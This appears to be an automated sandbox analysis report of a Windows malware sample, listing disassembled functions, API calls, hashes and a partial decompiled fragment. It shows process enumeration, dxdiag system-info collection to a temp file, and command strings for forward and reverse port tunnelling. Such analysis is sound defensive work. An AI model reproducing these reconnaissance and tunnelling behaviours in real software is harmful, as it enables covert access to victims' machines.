                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410A8A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410A98
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410AA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410AB1
                                    • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                    • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                    • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AC2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410ACB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AD4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AE5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AEE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$?size@?$basic_string@CreateD@1@@File$?data@?$basic_string@G@1@@G@2@@0@GdipHstd@@ImageV01@@V10@V?$basic_string@$?length@?$basic_string@CompatibleDeleteFromLoadSaveStreammalloc
                                  • String ID: dat$image/png$png
                                  • API String ID: 1465418526-186023265
                                  • Opcode ID: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                  • Instruction ID: 6c1464b703b8d6621652859688a13e3a01469ca8af73c80fd23fe2d238e37a16
                                  • Opcode Fuzzy Hash: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                  • Instruction Fuzzy Hash: 4F41E87280050DEBCB05EBE0ED5A9EE7B78EF54345B50807AF506A70A1EF745B48CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409EAA, Relevance: 48.2, APIs: 32, Instructions: 162processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                    • Part of subcall function 00412AEB: GetCurrentProcess.KERNEL32(00408F3A,?,?,00408F3A,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00412AFC
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                    • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                    • Part of subcall function 00412B4A: OpenProcess.KERNEL32(00000410,00000000,00409B39,6B03CB60), ref: 00412B5E
                                    • Part of subcall function 00412B4A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409FE3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409FF0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040A000
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A00C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A018
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A021
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A02D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A036
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A042
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A04B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A057
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A060
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A069
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A075
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A081
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A08D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A099
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0A2
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A0B0
                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 0040A0BF
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 0040A0CC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0D5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32$G@1@@NextOpenV01@@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                                  • String ID:
                                  • API String ID: 819894693-0
                                  • Opcode ID: 6d7e0a8e1be64d4d0e255c379d67c754dda12e9502e18d4a3b94b6445093a707
                                  • Instruction ID: 482952a8ea0ca2eb956ab1d6be5e182e2b7f1aefe0fc538246f9d1fd03369c75
                                  • Opcode Fuzzy Hash: 6d7e0a8e1be64d4d0e255c379d67c754dda12e9502e18d4a3b94b6445093a707
                                  • Instruction Fuzzy Hash: B151E07180021EABCB15EBA1ED49EDFB77CAF54345F0040A6B506E3052EB745B89CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E927, Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 121sleepfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _wgetenv.MSVCRT ref: 0040E93E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,00000000), ref: 0040E949
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040E954
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E95F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,/t ,?,00000000,00000000), ref: 0040E976
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000), ref: 0040E980
                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,?,00000000), ref: 0040E992
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000,00000000), ref: 0040E99B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000), ref: 0040E9A8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000000,00000000), ref: 0040E9B7
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • Sleep.KERNEL32(00000064,00000000,00000000), ref: 0040E9C7
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9D1
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9E6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E9F7
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040E9FE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040EA3C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040EA46
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000097,?,?,?,?,?,?), ref: 0040EA5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA77
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA80
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@$G@2@@std@@$??1?$basic_string@D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@?empty@?$basic_string@D@2@@0@FileG@2@@0@V10@0@$CreateD@1@@DeleteExecuteG@1@@ShellSleepV10@V10@@_wgetenv
                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                  • API String ID: 1966616101-2001430897
                                  • Opcode ID: ff0e39e396bbf46ea60dadb1ea34f8f26dedf6304284c23b1de840788f93d481
                                  • Instruction ID: 1c5eb7ae2d6a6dc7204c520a9e58a8966c6b8e2557f2cc0bdb06ecab60d4e380
                                  • Opcode Fuzzy Hash: ff0e39e396bbf46ea60dadb1ea34f8f26dedf6304284c23b1de840788f93d481
                                  • Instruction Fuzzy Hash: 0D41657280050DEFCB04EBE0ED4ADEEB77CEE54345B10402AF912A3091EB755A49CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A370, Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 205COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A383
                                  • SetEvent.KERNEL32(?), ref: 0040A38C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A395
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040A3AD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040A3BE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A3CD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • inet_ntoa.WS2_32 ref: 0040A41B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A42E
                                  • atoi.MSVCRT ref: 0040A435
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A472
                                  • atoi.MSVCRT ref: 0040A479
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040A4A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A544
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415B18), ref: 0040A56E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415B18), ref: 0040A578
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415908), ref: 0040A5AB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415908), ref: 0040A5B5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000085,?,?,?,?,0041B310,00415908), ref: 0040A5CC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5DD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$?c_str@?$basic_string@D@2@@0@Hstd@@V?$basic_string@$?length@?$basic_string@V12@$?substr@?$basic_string@V10@V10@0@atoi$??4?$basic_string@?find@?$basic_string@D@1@@EventV01@inet_ntoa
                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                  • API String ID: 4095635200-168337528
                                  • Opcode ID: f3929fae1f8e497e51fb93d2ade4ea54b572ef24a6e630ee0c1868d71aa5104e
                                  • Instruction ID: b25c6e2405df25c2c81854c085642773db686a1d66d7f735eb38a539f85e00a7
                                  • Opcode Fuzzy Hash: f3929fae1f8e497e51fb93d2ade4ea54b572ef24a6e630ee0c1868d71aa5104e
                                  • Instruction Fuzzy Hash: 3C61A371900309ABDB08BBB1EC4A9EE3B78FB54305F00853AF512A31E1EB78555487AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040221E, Relevance: 43.7, APIs: 29, Instructions: 151synchronizationthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 00402291
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6B015DF0), ref: 00402302
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402363
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040236D
                                  • CreateThread.KERNEL32(00000000,00000000,?,0041BE70,00000000,00000000), ref: 0040237E
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402389
                                  • CloseHandle.KERNEL32(00000000), ref: 00402392
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040D2B5,6B015DF0), ref: 004023A7
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023B1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023BA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023C3
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@CloseD@1@@EventHandleObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 3745950881-0
                                  • Opcode ID: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                  • Instruction ID: 9121e1d36d2ed1e5780a03bc3f6ba97c1b97061ac4fd9a6be39e0f6b7c1c719d
                                  • Opcode Fuzzy Hash: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                  • Instruction Fuzzy Hash: 0451FD7250060EEFCB049FA0DD88CEEBB78FF84355B00806AF916A71A0DB745985CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040295E, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 167windowmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 34%
                                  			E0040295E(void* __eflags, intOrPtr _a4, char _a7) {
				char _v5;
				void* _v12;
				char _v28;
				void* _v44;
				char _v60;
				char _v76;
				char _v92;
				struct tagMSG _v120;
				int _t29;
				void* _t35;
				intOrPtr _t41;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t62;
				void* _t63;
				intOrPtr _t95;
				void* _t97;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t107;

				_t107 = __eflags;
				_t95 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t95 + 0x18);
				_t29 = SetEvent( *(_t95 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t107,  &_v28,  &_v76, 0x41b310,  &_v76, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t104 = _t101 + 0x24;
